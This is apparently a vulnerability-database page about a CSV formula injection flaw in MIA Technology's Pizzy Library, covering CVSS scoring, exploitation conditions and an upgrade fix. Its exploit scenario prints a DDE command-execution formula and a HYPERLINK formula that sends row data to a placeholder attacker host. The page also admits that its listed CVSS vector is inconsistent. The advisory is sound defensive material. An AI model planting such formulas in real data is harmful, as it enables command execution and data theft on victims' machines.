Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Authenticated input injection (PR:L) over the network; exploitation requires victim to open the CSV (UI:R) and impact lands on the spreadsheet host, not Pizzy (S:C), with full CIA impact.
Primary rating from Vendor (TR-CERT).
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionNVD
Improper neutralization of formula elements in a CSV file vulnerability in MIA Technology Inc. Pizzy Library allows Code Injection.
This issue affects Pizzy Library: from 1.0.0.26250 before 1.3.9.26250.
AnalysisAI
CSV formula injection in MIA Technology's Pizzy Library (versions 1.0.0.26250 through 1.3.9.26250) allows authenticated attackers to inject malicious formula elements into generated CSV files, leading to code execution when the file is opened in a spreadsheet application. The flaw is rated CVSS 8.8 and was reported by TR-CERT, though no public exploit identified at time of analysis. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires (1) authenticated write access to a field that Pizzy Library subsequently serializes into a CSV export, consistent with CVSS PR:L; (2) a victim who downloads the generated CSV and opens it in a spreadsheet application (Excel, Calc, Sheets) that evaluates formulas - despite UI:N in the vector, CWE-1236 exploitation is gated on this victim action; and (3) the spreadsheet client either auto-enabling formulas/DDE or the user clicking through the protected-view warning. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H rates this 8.8 (High), but the vector is internally inconsistent with a classic CSV injection: real exploitation of CWE-1236 requires the victim to open the exported file in a spreadsheet client, which would normally warrant UI:R, and the impact lands on the downstream viewer rather than the Pizzy host (suggesting a scope change). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated low-privilege user of an application that embeds Pizzy Library submits a field value such as =cmd|'/c calc'!A1 or =HYPERLINK("http://attacker/?"&A1,"Click") into a record that will later be exported. A finance or admin user downloads the resulting CSV and opens it in Excel, at which point the formula executes, leaking row data over HTTP or invoking DDE to run an arbitrary command in the victim's session. |
| Remediation | Upgrade Pizzy Library to version 1.3.9.26250 or later, the first fixed release per the affected-range metadata; consult the TR-CERT bulletin at https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0383 for vendor coordination details. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all systems and applications using Pizzy Library versions 1.0.0.26250-1.3.9.26250; publish security advisory cautioning users against opening CSV files from untrusted sources. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Pizzy Library
View allResource flooding in MIA Technology Pizzy Library versions 1.0.0.26250 through 1.3.9.26250 allows authenticated remote a
Improper access control in MIA Technology Inc. Pizzy Library versions 1.0.0.26250 through 1.3.9.26250 allows authenticat
Same technique Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-36719
GHSA-qv7c-w6cp-c775